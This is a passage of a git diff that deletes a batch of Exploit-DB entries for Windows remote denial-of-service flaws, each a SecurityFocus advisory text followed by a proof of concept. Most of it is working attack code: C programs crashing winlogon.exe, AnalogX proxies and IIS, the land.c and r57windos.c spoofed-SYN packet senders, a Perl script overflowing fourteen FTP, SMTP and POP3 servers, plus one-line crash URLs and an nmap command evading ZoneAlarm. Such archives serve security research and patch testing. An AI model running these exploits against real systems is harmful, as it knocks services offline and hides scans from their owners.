using the Internet Anywhere Mail Server Version:3.1.3. Build: 1065 by True North Software, Inc. <184.4675258510890593303@someco.com> -user username -+OK valid -pass password -+OK Authorized -RETR 11111111111 \ No newline at end of file diff --git a/platforms/windows/remote/19820.txt b/platforms/windows/remote/19820.txt deleted file mode 100755 index ca8374767..000000000 --- a/platforms/windows/remote/19820.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/1076/info - -Requesting a URL containing a string of exactly eight characters following the /cgi-bin/ directory (17 characters in total) will cause AnalogX SimpleServer:WWW to shut down. - -http://target/cgi-bin/<8 character long string> \ No newline at end of file diff --git a/platforms/windows/remote/19871.txt b/platforms/windows/remote/19871.txt deleted file mode 100755 index c7cc7235e..000000000 --- a/platforms/windows/remote/19871.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/1137/info - -Certain versions of Zone Labs personal Firewall have a vulnerability which allows malicious users to port scan the firewall without being detected. In particular if the port scan originates from source port 67 on the attacking host the ZoneAlarm fails to register the attack. - -nmap -g67 -P0 -p130-140 -sU \ No newline at end of file diff --git a/platforms/windows/remote/20005.c b/platforms/windows/remote/20005.c deleted file mode 100755 index 04899c7c7..000000000 --- a/platforms/windows/remote/20005.c +++ /dev/null @@ -1,524 +0,0 @@ -source: http://www.securityfocus.com/bid/1331/info - -In special circumstances while handling requests to access the Remote Registry Server, Windows NT 4.0 can crash due to winlogon.exe's inability to process specially malformed remote registry requests. Rebooting the machine would be required in order to regain normal functionality. - -Only authenticated users on the network would be able to exploit this vulnerability. If Windows NT was configured to deny all remote registry requests, it would not be affected by this vulnerability under any conditions. - -/* - * crash_winlogon.c - * - * by Renaud Deraison - deraison@cvs.nessus.org - * - * This code is released under the GNU General Public License. - * (thanks for respecting this license) - * - * In case you are wondering, here is the motto I applied for this code : - * - * "Structures are for sissies" - */ -#include -#include -#ifdef WIN32 -#include -#define bzero(x,y) memset(x, 0, y) -#else -#include -#include -#include -#include -#define closesocket(x) close(x) -#endif - - -char * netbios_name(char * orig) -{ - int i, len; - char * ret = malloc(40); - - bzero(ret, 40); - len = strlen(orig); - for(i=0;i<16;i++) - { - if(i >= len) - strcat(ret, "CA"); - else - { - int odiv, omod; - - odiv = (orig[i] / 16) + 'A'; - omod = (orig[i] % 16) + 'A'; - ret[strlen(ret)]=odiv; - ret[strlen(ret)]=omod; - } - } - return(ret); -} - -char * netbios_redirector() -{ - int i; - char * ret = malloc(31); - bzero(ret, 31); - for(i=0;i<15;i++)strcat(ret, "CA"); - strcat(ret, "AA"); - return(ret); -} - - -char* unicode(char * data) -{ - int len = strlen(data); - int i; - char * ret = malloc(110); - int l = 0; - - bzero(ret,110); - for(i=0;i -# -# See the Nessus Scripts License for details -# - -if(description) -{ - script_id(10414); - script_cve_id("CAN-2000-0377"); - name["english"] = "WinLogon.exe DoS"; - name["francais"] = "Dini de service WinLogon.exe"; - - script_name(english:name["english"], - francais:name["francais"]); - - desc["english"] = " - -It seems that is was possible to crash remotely -winlogon.exe by sending a malformed request to -access the registry of the remote host. - -As soon as you validate the error box, the host -will reboot. - - -Solution : apply hotfix Q264684 - -Risk factor : High - -See also : http://www.microsoft.com/technet/security/bulletin/ms00-040.asp"; - - - desc["francais"] = " - -Il semble qu'il ait iti possible de faire -planter le programme WinLogon.exe en lui -envoyant une requhte mal formie pour accider -` sa base de registres. - -Dhs que vous validerez la boite de dialogue, -l'hote distant redimarrera. - -Solution : appliquez le hotfix Q264684 - -Facteur de risque : Elevi - -Voir aussi : http://www.microsoft.com/technet/security/bulletin/ms00-040.asp"; - - - script_description(english:desc["english"], - francais:desc["francais"]); - - summary["english"] = "crashes winlogon.exe"; - summary["francais"] = "fait planter winlogon.exe"; - script_summary(english:summary["english"], - francais:summary["francais"]); - - script_category(ACT_DENIAL); - - script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison"); - family["english"] = "Denial of Service"; - family["francais"] = "Dini de service"; - script_family(english:family["english"], francais:family["francais"]); - - script_dependencies("netbios_name_get.nasl", - "smb_login.nasl"); - script_require_keys("SMB/name", "SMB/login", "SMB/password"); - script_require_ports(139); - exit(0); -} - - -#-----------------------------------------------------------------# -# Convert a netbios name to the netbios network format # -#-----------------------------------------------------------------# -function netbios_name(orig) -{ - ret = ""; - len = strlen(orig); - for(i=0;i<16;i=i+1) - { - if(i >= len) - { - c = "CA"; - } - else - { - o = ord(orig[i]); - odiv = o/16; - odiv = odiv + ord("A"); - omod = o%16; - omod = omod + ord("A"); - c = raw_string(odiv, omod); - } - ret = ret+c; - } - return(ret); -} - -#--------------------------------------------------------------# -# Returns the netbios name of a redirector # -#--------------------------------------------------------------# - -function netbios_redirector_name() -{ - ret = crap(data:"CA", length:30); - ret = ret+"AA"; - return(ret); -} - -#-------------------------------------------------------------# -# return a 28 + strlen(data) + (odd(data)?0:1) long string # -#-------------------------------------------------------------# -function unicode(data) -{ - len = strlen(data); - ret = raw_string(ord(data[0])); - - for(i=1;i -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -struct analogXDoS_types { - char *service; - int port; - char *command; - int overflow_string_size; -}; - -struct analogXDoS_types analogXDoS_types[]={ - {"AnalogX FTP Proxy ",21,"USER BO@userfriendly.org\n",370}, - {"AnalogX SMTP Proxy",25,"HELO BO@userfriendly.org\n",370}, - {"AnalogX POP3 Proxy",110,"USER BO@userfriendly.org\n",370}, - {NULL,0,NULL,0} -}; - - - -int -openhost(char *host,int port) { - int sock; - struct sockaddr_in addr; - struct hostent *he; - he=gethostbyname(host); - if (he==NULL) return -1; - sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto); - if (sock==-1) return -1; - memcpy(&addr.sin_addr, he->h_addr, he->h_length); - addr.sin_family=AF_INET; - addr.sin_port=htons(port); - if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1; - return sock; -} - -void -sends(int sock,char *buf) { - write(sock,buf,strlen(buf)); -} - -void -analogXcrash(char *host, int type) -{ - char *buf; - int sock, i, x, buffer_size; - printf("Type Number: %d\n",type); - printf("Service : %s\n",analogXDoS_types[type].service); - printf("Port : %d\n",analogXDoS_types[type].port); - printf("Let the show begin ladyes...\n"); - printf("Connecting to %s [%d]...",host,analogXDoS_types[type].port); - sock=openhost(host,analogXDoS_types[type].port); - if (sock==-1) - { - printf("FAILED!\n"); - printf("Couldnt connect...leaving :|\n\n"); - exit(-1); - } - printf("SUCCESS!\n"); - printf("Allocating memory for buffer..."); - buffer_size=(strlen(analogXDoS_types[type].command) - + - analogXDoS_types[type].overflow_string_size); - if (!(buf=malloc(buffer_size))) - { - printf("FAILED!\n"); - printf("Leaving... :[\n\n"); - exit(-1); - } - printf("WORKED! (heh)\n"); - for(i=0;;i++) - if ((analogXDoS_types[type].command[i]=='B') && - (analogXDoS_types[type].command[i+1]=='O')) break; - else buf[i]=analogXDoS_types[type].command[i]; - for(x=0;x [port]\n",argv[0]); - show_types(); - printf("\n*Enjoy*...\n\n"); - } - else if (atoi(argv[2])<=i) - if (argc==3) analogXcrash(argv[1],atoi(argv[2])); - else { - analogXDoS_types[atoi(argv[2])].port=atoi(argv[3]); - analogXcrash(argv[1],atoi(argv[2])); - } - else - { - printf("Invalid type value (max type=%d)\n",i); - printf("Type %s for more information :)\n\n",argv[0]); - } -} diff --git a/platforms/windows/remote/20225.pl b/platforms/windows/remote/20225.pl deleted file mode 100755 index f5aea7dce..000000000 --- a/platforms/windows/remote/20225.pl +++ /dev/null @@ -1,245 +0,0 @@ -source: http://www.securityfocus.com/bid/1689/info - -Alt-N MDaemon 3.1.1 is subject to a denial of service. If a remote user requests a specially crafted URL to the web services within MDaemon the service will crash. A restart of the service is required in order to gain normal functionality. - -#!/usr/bin/perl -##################################################################### -# Based upon advisories by USSR (www.ussrback.com) # -# # -# Demonstration script to remotely overflow various server buffers, # -# resulting in a denial of service, for TESTING purposes only. # -# Runs on *nix & WinXX with perl & Net::Telnet available from CPAN # -# # -# G6 FTP Server v2.0 beta4/5 # -# MDaemon httpd Server v2.8.5.0 # -# Avirt Mail Server v3.5 # -# BisonWare FTP Server v3.5 # -# Vermillion FTP Server v1.23 # -# ZetaMail POP3 Server v2.1 # -# WFTPD FTP Server 2.40 # -# BFTelnet Server v1.1 # -# Broker FTP Server v3.5 # -# ExpressFS FTP server v2.x # -# XtraMail POP3 Server v1.11 # -# Cmail SMTP Server v2.4 # -# PakMail SMTP/POP3 v1.25 # -# # -# December '99 # -##################################################################### - -use IO::Socket; -use Getopt::Std; -#use Net::Telnet; -getopts('h:p:t:u:v', \%args); -if(!defined($args{h}) && !defined($args{t})) { -print qq~Usage: $0 -h -t ((-u username) | (-p password)) | -v - - -h victim to test remote overflow DoS on - -t server type (check the -v option for list) - -u username authorisation (required if server prompts for username) - -p password authentication (required if user/passwd is expected) - -v lists all servers vulnerable to each DoS - -~; exit; } - -if(defined($args{u})) { $user=$args{u}; } -if(defined($args{p})) { $pass=$args{p}; } -if(defined($args{v})) { &vulnerable; } -if(defined($args{h}) && defined($args{t})){ -if(($args{t}) == 1) { &G6; } -if(($args{t}) == 2) { &mdaemon; } -if(($args{t}) == 3) { &avirt; } -if(($args{t}) == 4) { &bisonware; } -if(($args{t}) == 5) { &vermillion; } -if(($args{t}) == 6) { &zetamail; } -if(($args{t}) == 7) { &wftpd; } -if(($args{t}) == 8) { &bftelnet; } -if(($args{t}) == 9) { &broker; } -if(($args{t}) == 10) { &expressfs; } -if(($args{t}) == 11) { &xtramail; } -if(($args{t}) == 12) { &cmail; } -if(($args{t}) == 13) { &pakmail; } -if(($args{t}) == 14) { &pakpop; }} - -sub G6 { -$denial .= "A" x 2000; -$victim=$args{h}; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect.\n"; - $socket->autoflush(1); -print $socket "$denial\n"; # user -print "\nSent overflow to $victim\n"; -close $socket; } - -sub mdaemon { -$victim=$args{h}; -$denial .= "A" x 1025; -$url = "/$denial"; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "80") or die "Can't connect.\n"; -print $socket "GET $url\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub avirt { -$victim=$args{h}; -$denial .= "A" x 856; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "25") or die "Can't connect\n"; - $socket->autoflush(1); -print $socket "user $user\n"; -print $socket "pass $denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub bisonware { -$victim=$args{h}; -$denial .= "A" x 2000; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect\n"; - $socket->autoflush(1); -print $socket "$denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub vermillion { -$victim=$args{h}; -$denial .= "A" x 504; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect\n"; - $socket->autoflush(1); -print $socket "$user\n"; -print $socket "$pass\n"; -print $socket "cwd $denial\n"; -for($i=0; $i<=3; $i++) { print $socket "CWD $denial\n"; } -print "\nSent overflow to $victim\n"; -close $socket; } - -sub zetamail { -$victim=$args{h}; -$denial .= "A" x 3500; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "110") or die "Can't connect.\n"; -print $socket "user $denial\n"; -print $socket "pass $denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub wftpd { -$victim=$args{h}; -$denial .= "A" x 255; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect.\n"; -print $socket "$user\n"; -print $socket "$pass\n"; -print $socket "MKDIR $denial\n"; -print $socket "CWD $denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub bftelnet { -# use Net::Telnet; -$victim=$args{h}; -$denial .= "A" x 3090; -$telnet = new Net::Telnet ( Timeout =>10, - Errmode =>'die'); -$telnet->open('$victim'); -$telnet->waitfor('/Login: $/i'); -$telnet->print('$denial'); -print "\nSent overflow to $victim\n"; -close $telnet; } - -sub broker { -$victim=$args{h}; -$denial .= "A" x 2730; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect.\n"; -print $socket "$denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - - -sub expressfs { -$victim=$args{h}; -$denial .= "A" x 654; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect.\n"; -print $socket "$denial\n"; -print $socket "AAAAAAAAAAAAAAAAAAA\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub xtramail { -$victim=$args{h}; -$denial .= "A" x 2930; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "25") or die "Can't connect.\n"; -print $socket "MAIL FROM: test\@localhost\n"; -print $socket "RCPT TO: $denial\@localhost\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub cmail { -$victim=$args{h}; -$denial .= "A" x 7090; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "25") or die "Can't connect.\n"; -print $socket "MAIL FROM: $denial\@localhost\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub pakmail { -$victim=$args{h}; -$denial .= "A" x 1390; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "25") or die "Can't connect.\n"; -print $socket "MAIL FROM: test\@localhost\n"; -print $socket "RCPT TO: $denial\@localhost\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub pakpop { -$victim=$args{h}; -$denial .= "A" x 1400; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "110") or die "Can't connect.\n"; -print $socket "user test\n"; -print $socket "pass $denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub vulnerable { -print qq~ - ______________________________________________________________________________ - Vulnerable Daemon Version Vulnerable Daemon Version - ______________________________________________________________________________ - - [1] G6 FTP Server v2.0b4/5 [2] MDaemon httpd Server v2.8.5.0 - - [3] Avirt Mail Server v3.5 [4] BisonWare FTP Server v3.5 - - [5] Vermillion FTP Server v1.23 [6] ZetaMail SMTP Server v2.1 - - [7] WFTPD FTP Server v2.40 [8] BFTelnet Server v1.1 - - [9] Broker FTP Server v3.5 [10] ExpressFS FTP Server v2.x - -[11] XtraMail POP3 Server v1.11 [12] Cmail SMTP Server v2.4 - -[13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25 - -~; exit; } - diff --git a/platforms/windows/remote/20403.txt b/platforms/windows/remote/20403.txt deleted file mode 100755 index 5ea76411b..000000000 --- a/platforms/windows/remote/20403.txt +++ /dev/null @@ -1,8 +0,0 @@ -source : http://www.securityfocus.com/bid/1941/info - - -Small HTTP Server is a full service web server. This utility is less than 30Kb and requires minimal system resources. - -Small HTTP Server is subject to a denial of service. When making an http request without a filename specified the server will attempt to locate index.html in that particular directory, if index.html does not exist the server will utilize a large amount of system memory . If numerous http requests, again structured without a filename, are sent to the web server, an attacker could cause the server to consume all system memory. A restart of the application is required in order to gain normal functionality. - -http://target/subdirectory/ \ No newline at end of file diff --git a/platforms/windows/remote/20656.txt b/platforms/windows/remote/20656.txt deleted file mode 100755 index 9e3ab1609..000000000 --- a/platforms/windows/remote/20656.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/2435/info - -It is possible for a remote user to cause a denial of service condition in Robin Twombly A1 Server. - -Submitting a specially crafted request via a telnet connection, could cause the A1 server to crash. - -A restart of the server is required in order to gain normal functionality. - -echo `perl -e 'print "A" x 1000'` | telnet target \ No newline at end of file diff --git a/platforms/windows/remote/20682.txt b/platforms/windows/remote/20682.txt deleted file mode 100755 index 3f696342a..000000000 --- a/platforms/windows/remote/20682.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/2468/info - -A denial of service condition exists in Michael Lamont Savant web server. Requesting a specially crafted URL composed of '%' characters could cause the server to stop responding. - -www.target/%%% \ No newline at end of file diff --git a/platforms/windows/remote/20728.txt b/platforms/windows/remote/20728.txt deleted file mode 100755 index 00be5bf44..000000000 --- a/platforms/windows/remote/20728.txt +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/2543/info - -A denial of service vulnerability exists in versions of 602Pro Lan Suite. - -A remote attacker may connect to port 80 of the vulnerable host. Via this connection, the attacker submits a long request composed of at least 1033 characters. This excess input causes an overflows of the server's input buffer and crashes Lansuite.exe and all applicable services. - -GET / HTTP/1.1 -Proxy-Authorization:AAAAAAAAAAAAA..... - -Where A x 1033 or more characters, as long as its -over 1032, it will work. \ No newline at end of file diff --git a/platforms/windows/remote/20783.txt b/platforms/windows/remote/20783.txt deleted file mode 100755 index fa3624521..000000000 --- a/platforms/windows/remote/20783.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/2636/info - -"The Bat!" is an MUA for Windows by Rit Research Labs. - -"The Bat!" is vulnerable to a remote denial of service attack. Email messages in which carriage return (CR) characters are not followed by a linefeed (LF) can cause "The Bat!" to incorrectly interpret the message's structure. This can lead "The Bat!" to read text in the message body as a response from the POP3 server. The current (corrupt) message will not be deleted from the server, and the mail download process will stop. - -As a result, the user will remain unable to receive new email messages from the affected POP3 account. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20783.zip \ No newline at end of file diff --git a/platforms/windows/remote/20802.c b/platforms/windows/remote/20802.c deleted file mode 100755 index c2bc9334c..000000000 --- a/platforms/windows/remote/20802.c +++ /dev/null @@ -1,142 +0,0 @@ -source: http://www.securityfocus.com/bid/2654/info - -Microsoft Internet Information Server is vulnerable to a denial of service. - -This particular denial of service affects versions 2.0, 3.0 and 4.0 of the server prior to service pack 4. - -The URL which causes this issue is of the format "http://server/?anything=XXXXX" - note that no existing file need be requested. - -This is not a buffer overflow; a URL of specific length must be sent (between 4k and 8k), anything longer or shorter will not affect the server. - -/* Some days ago I found the page http://www.eden.com/~tfast/jihad.html - Then I found the java program IIServerSlayer.class made by - Todd Fast , the author of the web pages. - Now I have ported that program in gcc from java using strace and - disassembling IIServerSlayer.class with javap (part of jdk). - - For now is tested by me only on Linux 2.1.42 compiled with gcc 2.7.2.2 - and glibc. - by Andrea Arcangeli */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int s; -struct sockaddr_in addr, spoofedaddr; -struct hostent *host; - -int open_sock(int sock, char *server, int port) { - struct sockaddr_in blah; - struct hostent *he; - bzero((char *)&blah,sizeof(blah)); - blah.sin_family=AF_INET; - blah.sin_port=htons(port); - if ((he = gethostbyname(server)) != NULL) { - bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); - } - else { - if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { - perror("gethostbyname()"); - return(2); - } - } - if (connect(sock,(struct sockaddr *)&blah,16)==-1) { - perror("connect()"); - close(sock); - return(3); - } - return 0; -} - -char *generate_die_string(int lenght) { - char letter='X'; - char *str_begin = "GET /?bye=",*str_end = " HTTP/1.0\r\n\r\n",*str; - int i; - str = (char *)malloc(lenght+strlen(str_end)+strlen(str_begin)+1); - strcpy(str,str_begin); - for(i=strlen(str_begin);i [string_lenght] [port]\n",argv[0]); - printf("[-v] = verbose mode to view the server reply\n"); - printf("[-f] = force running over non or patched IIS/3.0 web server\n"); - exit(0); - } - for(i=1;i param+2) lenght = atoi(argv[param+2]); - if(argc > param+3) port = atoi(argv[param+3]); - for(i=0;i<3;i++,lenght++) { - if(i) IIServerSlayer(argv[param+1],lenght,port,flags); - else IIServerSlayer(argv[param+1],0,port,flags); - if(i == 1 || i == 0) lenght--; - } - if((pid = fork())) { - if(pid == -1) { - perror("I can' t fork\n"); - exit(-1); - } - usleep(60000000); /* wait for 1 minute */ - kill(pid,SIGTERM); - } - else { - IIServerSlayer(argv[param+1],lenght,port,flags); - printf("Sorry, %s is alive yet\n",argv[param+1]); - } - exit(0); -} - - - - diff --git a/platforms/windows/remote/20812.c b/platforms/windows/remote/20812.c deleted file mode 100755 index b1b892c43..000000000 --- a/platforms/windows/remote/20812.c +++ /dev/null @@ -1,127 +0,0 @@ -source: http://www.securityfocus.com/bid/2666/info - -A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. - -It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. - -**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. - -/* land.c by m3lt, FLC - crashes a win95 box */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -struct pseudohdr -{ - struct in_addr saddr; - struct in_addr daddr; - u_char zero; - u_char protocol; - u_short length; - struct tcphdr tcpheader; -}; - -u_short checksum(u_short * data,u_short length) -{ - register long value; - u_short i; - - for(i=0;i<(length>>1);i++) - value+=data[i]; - - if((length&1)==1) - value+=(data[i]<<8); - - value=(value&65535)+(value>>16); - - return(~value); -} - -int main(int argc,char * * argv) -{ - struct sockaddr_in sin; - struct hostent * hoste; - int sock; - char buffer[40]; - struct iphdr * ipheader=(struct iphdr *) buffer; - struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); - struct pseudohdr pseudoheader; - - fprintf(stderr,"land.c by m3lt, FLC\n"); - - if(argc<3) - { - fprintf(stderr,"usage: %s IP port\n",argv[0]); - return(-1); - } - - bzero(&sin,sizeof(struct sockaddr_in)); - sin.sin_family=AF_INET; - - if((hoste=gethostbyname(argv[1]))!=NULL) - bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); - else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) - { - fprintf(stderr,"unknown host %s\n",argv[1]); - return(-1); - } - - if((sin.sin_port=htons(atoi(argv[2])))==0) - { - fprintf(stderr,"unknown port %s\n",argv[2]); - return(-1); - } - - if((sock=socket(AF_INET,SOCK_RAW,255))==-1) - { - fprintf(stderr,"couldn't allocate raw socket\n"); - return(-1); - } - - bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); - ipheader->version=4; - ipheader->ihl=sizeof(struct iphdr)/4; - ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); - ipheader->id=htons(0xF1C); - ipheader->ttl=255; - ipheader->protocol=IP_TCP; - ipheader->saddr=sin.sin_addr.s_addr; - ipheader->daddr=sin.sin_addr.s_addr; - - tcpheader->th_sport=sin.sin_port; - tcpheader->th_dport=sin.sin_port; - tcpheader->th_seq=htonl(0xF1C); - tcpheader->th_flags=TH_SYN; - tcpheader->th_off=sizeof(struct tcphdr)/4; - tcpheader->th_win=htons(2048); - - bzero(&pseudoheader,12+sizeof(struct tcphdr)); - pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; - pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; - pseudoheader.protocol=6; - pseudoheader.length=htons(sizeof(struct tcphdr)); - bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); - tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); - - if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct -sockaddr_in))==-1) - { - fprintf(stderr,"couldn't send packet\n"); - return(-1); - } - - fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); - - close(sock); - return(0); -} - - diff --git a/platforms/windows/remote/20814.c b/platforms/windows/remote/20814.c deleted file mode 100755 index 53deb71b6..000000000 --- a/platforms/windows/remote/20814.c +++ /dev/null @@ -1,139 +0,0 @@ -source: http://www.securityfocus.com/bid/2666/info - -A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. - -It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. - -**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. - -#define _BSD_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -/* -Windows Server 2003 and XP SP2 remote DoS exploit -Tested under OpenBSD 3.6 at WinXP SP 2 -Vuln by Dejan Levaja -(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru -Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor -Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy -All rights reserved. -*/ - -//checksum function by r0ach -u_short checksum (u_short *addr, int len) -{ -u_short *w = addr; -int i = len; -int sum = 0; -u_short answer; -while (i > 0) -{ -sum += *w++; -i-=2; -} -if (i == 1) sum += *(u_char *)w; -sum = (sum >> 16) + (sum & 0xffff); -sum = sum + (sum >> 16); -return (~sum); -} -int main(int argc, char ** argv) -{ -struct in_addr src, dst; -struct sockaddr_in sin; -struct _pseudoheader { -struct in_addr source_addr; -struct in_addr destination_addr; -u_char zero; -u_char protocol; -u_short length; -} pseudoheader; -struct ip * iph; -struct tcphdr * tcph; -int mysock; -u_char * packet; -u_char * pseudopacket; -int on = 1; -if( argc != 3) -{ -fprintf(stderr, "r57windos.c by __blf\n"); -fprintf(stderr, "RusH Security Team\n"); -fprintf(stderr, "Usage: %s \n", argv[0]); -return EX_USAGE; -} -if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) -{ -perror("malloc()\n"); -return EX_OSERR; -} -inet_aton(argv[1], &src); -inet_aton(argv[1], &dst); -iph = (struct ip *) packet; -iph->ip_v = IPVERSION; -iph->ip_hl = 5; -iph->ip_tos = 0; -iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); -iph->ip_off = htons(IP_DF); -iph->ip_ttl = 255; -iph->ip_p = IPPROTO_TCP; -iph->ip_sum = 0; -iph->ip_src = src; -iph->ip_dst = dst; -tcph = (struct tcphdr *)(packet +sizeof(struct ip)); -tcph->th_sport = htons(atoi(argv[2])); -tcph->th_dport = htons(atoi(argv[2])); -tcph->th_seq = ntohl(rand()); -tcph->th_ack = rand(); -tcph->th_off = 5; -tcph->th_flags = TH_SYN; // setting up TCP SYN flag here -tcph->th_win = htons(512); -tcph->th_sum = 0; -tcph->th_urp = 0; -pseudoheader.source_addr = src; -pseudoheader.destination_addr = dst; -pseudoheader.zero = 0; -pseudoheader.protocol = IPPROTO_TCP; -pseudoheader.length = htons(sizeof(struct tcphdr)); -if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) -{ -perror("malloc()\n"); -return EX_OSERR; -} -memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); -memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); -tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); -mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); -if(!mysock) -{ -perror("socket!\n"); -return EX_OSERR; -} -if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) -{ -perror("setsockopt"); -shutdown(mysock, 2); -return EX_OSERR; -} -sin.sin_family = PF_INET; -sin.sin_addr = dst; -sin.sin_port = htons(80); -if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) -{ -perror("sendto()\n"); -shutdown(mysock, 2); -return EX_OSERR; -} -printf("Packet sent. Remote machine should be down.\n"); -shutdown(mysock, 2); -return EX_OK; -} diff --git a/platforms/windows/remote/20830.txt b/platforms/windows/remote/20830.txt deleted file mode 100755 index ef4e9a3c6..000000000 --- a/platforms/windows/remote/20830.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/2704/info - -Versions of Jana Server are vulnerable to a denial of service attack. - -It is possible to remotely crash a system running Jana Server by submitting a URL request which specifies an MS-DOS devicename. - -A hard reboot of the exploited server will be required to restore web services. - -www.example.com/aux \ No newline at end of file diff --git a/platforms/windows/remote/20904.pl b/platforms/windows/remote/20904.pl deleted file mode 100755 index 1db094137..000000000 --- a/platforms/windows/remote/20904.pl +++ /dev/null @@ -1,33 +0,0 @@ -source: http://www.securityfocus.com/bid/2834/info - -Pragma InterAccess for Microsoft 95/98 is a fully-featured commercial Telnet server. - -Pragma InterAccess does not adequately compensate for large bursts of data being sent to port 23(telnet). If an excessive amount of characters(15000+) are sent to this port then the program will terminate and telnet services will shut down on that host. The daemon must be restarted to regain functionality. - -This may be due to a buffer overflow condition. If this is the case, it may be possible for attackers to execute arbitrary code on the target host. - -#!/usr/bin/perl -# -# PI.PL - Crashes Pragma Interaccess 4.0 Server -# Written by nemesystm of the DHC -# http://dhcorp.cjb.net - neme-dhc@hushmail.com -# -#### -use Socket; - -die "$0 - Crashes Pragma Interaccess 4.0 Server. -written by 